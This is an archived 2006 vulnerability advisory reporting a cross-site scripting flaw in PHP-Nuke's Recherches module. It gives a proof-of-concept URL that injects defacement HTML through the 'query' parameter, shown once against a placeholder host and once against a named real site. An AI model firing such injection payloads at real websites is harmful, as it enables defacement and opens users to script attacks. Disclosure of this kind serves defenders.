PHP - Nuke Recherches Module 7.x Version Cross Site Scripting {!}

2006-05-25T00:00:00
ID SECURITYVULNS:DOC:12784
Type securityvulns
Reporter Securityvulns
Modified 2006-05-25T00:00:00

Description

PHP - Nuke Recherches Module 7.x Version Cross Site Scripting {!}


Credit : WiLdBoY, The-BeKiR

Mail : Root@Root-Security.Org

Published : 05/24/2006


XSS Injection :

http://www.site.com/modules.php?op=modload&name=Recherches&query=<h1>Hacked By WiLdBoY</h1>

Example :

http://www.phpnuke.org.br/modules.php?op=modload&name=Recherches&query=<h1>Hacked By WiLdBoY</h1>


Greetz :

Liz0ziM, Erne, Poizonb0x